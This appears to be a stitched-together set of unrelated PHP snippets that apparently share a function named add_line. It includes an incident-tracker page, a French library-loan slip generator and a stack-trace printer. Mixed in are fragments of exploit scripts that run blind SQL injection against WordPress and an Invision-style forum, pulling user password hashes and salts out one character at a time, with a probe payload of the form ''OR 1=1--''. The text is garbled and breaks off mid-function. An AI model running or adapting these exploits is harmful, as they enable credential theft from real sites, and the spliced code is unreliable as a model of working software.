<div id="wrapper" style="width:95%;"> <div id="content"> <?php if ($_SESSION['logged_in'] == 1) { echo "<div id=\"inv_menu\">\n\t\t<div style=\"float:left\">Logged in as: " . $_SESSION['username'] . "</div>\n"; if ($allow_edit) { echo "\n\t\t\t\t<a href=\"" . $php_self . "?function=get_incidents\" class=\"menulink\">Browse Incidents</a> |\n\t\t\t\t<a href=\"" . $php_self . "?function=add_line\" class=\"menulink\">Add New Incident</a> |"; } //echo " <a href=\"" . $php_self . "\" class=\"menulink\" onClick=\"open_calendar()\">View Calendar</a> |"; echo "<a href=\"admin/index.php\" class=\"menulink\">Admin Home</a> |\n\t\t\t\t<a href=\"admin/index.php?logout=1\" class=\"menulink\">Logout</a>\n\t\t\t</div><br style=\"clear:left;\">\n"; switch ($function) { case "add_line": if ($_POST['status'] == "insert") { add_line(); add_line_form($php_self); } else { add_line_form($php_self); } break; case "rm_line": if ($_POST['status'] == "remove") { rm_line(); $get_incidents_result = get_incidents(); display_incidents($get_incidents_result, $php_self); } else { rm_line_form($_GET['idx'], $php_self); } break; case "show_incident_details":
$prefix = 'wp_'; // WordPress table prefix, default is "wp_" //====================================================================== echo "Target: {$url}\n"; echo "sql table prefix: {$prefix}\n"; if (empty($suffix)) { $suffix = md5(substr($url, 0, strlen($url) - 24)); } echo "cookie suffix: {$suffix}\n"; echo "testing probe delays \n"; $norm_delay = get_normdelay($testcnt); echo "normal delay: {$norm_delay} deciseconds\n"; $hash = get_hash(); add_line("Target: {$url}"); add_line("User ID: {$id}"); add_line("Hash: {$hash}"); echo "\nWork finished\n"; echo "Questions and feedback - http://www.waraxe.us/ \n"; die("See ya! :) \n"); /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// function get_hash() { $len = 32; $field = 'user_pass'; $out = ''; echo "finding hash now ...\n"; for ($i = 1; $i < $len + 1; $i++) { $ch = get_hashchar($field, $i); echo "got {$field} pos {$i} --> {$ch}\n"; $out .= "{$ch}";
} $header_aut .= implode(", ", $aut1_libelle); } $header_aut ? $auteur = " / " . $header_aut : ($auteur = ""); // récupération du titre de série if ($expl->tparent_id && $expl->m_id) { $parent = new serie($expl->tparent_id); $tit_serie = $parent->name; if ($expl->tnvol) { $tit_serie .= ', ' . $expl->tnvol; } } if ($tit_serie) { $expl->tit = $tit_serie . '. ' . $expl->tit; } // cote: soit param persio de notice, ou bien la vraie cote de l'exemplaire $p_perso = new parametres_perso("notices"); $cote = $expl->expl_cote; if (!$cote) { $cote = $p_perso->read_base_fields_perso("ancienne_cote", $expl->s_id); } $ourPDF->SetY(50); add_line("Titre", $expl->tit); add_line("No. exemplaire", $cote); if ($expl->bulletin_numero) { add_line("Numéro", $numero); } add_line("Code", $cb_doc); add_line("Date", $expl->aff_pret_date . ' ' . date("H:i")); add_line("Emprunteur", $emprunteur); $ourPDF->OutPut();
add_line("------------------------------------------"); if ($ch_option == 2) { $hash = get_hash($i); $salt = get_salt($i); $line = "{$i}:{$hash}:{$salt}"; add_line($line); xecho("\n------------------------------------------\n"); xecho("User ID: {$i}\n"); xecho("Hash: {$hash}\n"); xecho("Salt: {$salt}"); xecho("\n------------------------------------------\n"); } else { if ($ch_option == 1) { $uname = get_user($i); $line = "The username for id {$i} is {$uname}"; add_line($line); xecho("{$uname}"); } } xecho("\nQuestions and feedback - http://de.crypt.in/ \n"); die(" \n"); ////////////////////////////////////////////////////////////////////// function login_to_forum($user, $pass) { global $url; $post = 'app=core&module=global§ion=login&do=process&username='******'&password='******'&rememberMe=1'; $buff = trim(make_post($url, $post, '', $url)); if (strpos($buff, 'The login was successful!') > 0) { xecho("Logged in.\n"); } else { xecho("Error: Unable to login.");
if (is_null($arg)) { $arg_name = "NULL"; } else { if (is_string($arg)) { $arg_name = $arg; } else { $arg_name = strval($arg); } } } } $arg_name = preg_replace("#\\s+#", " ", $arg_name); $print_able_args[] = str::limit_chars($arg_name, 15, ""); } } $msg_line .= implode(", ", $print_able_args); $msg_line .= ")"; add_line($msg_line); $x++; } } add_break(); echo "\n"; function add_line($str) { echo " | " . str_pad(str::limit_chars($str, $_ENV['box_width'] - 4, ""), $_ENV['box_width'] - 4, " ") . " |\n"; } function add_break() { echo " +" . str_repeat('-', $_ENV['box_width'] - 2) . "+\n"; }
//===================================================================== xecho("Target: {$url}\n"); xecho("Sql table prefix: {$prefix}\n"); xecho("Testing target URL ... \n"); test_target_url(); xecho("Target URL seems to be valid\n"); xecho("Testing target ID ... \n"); test_target_id(); xecho("Target ID seems to be valid\n"); $hash = get_hash(); $salt = get_salt(); add_line("Target: {$url}"); add_line("User ID: {$id}"); add_line("Hash: {$hash}"); add_line("Salt: {$salt}"); add_line("------------------------------------------"); xecho("\n------------------------------------------\n"); xecho("Hash: {$hash}\n"); xecho("Salt: {$salt}"); xecho("\n------------------------------------------\n"); xecho("\nQuestions and feedback - http://www.waraxe.us/ \n"); die("See ya! :) \n"); ////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////// function test_target_url() { global $url; $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- '; $buff = trim(make_post($url, $post, '', $url)); if ($buff !== 'found') { die('Invalid response, target URL not valid? Exiting ...');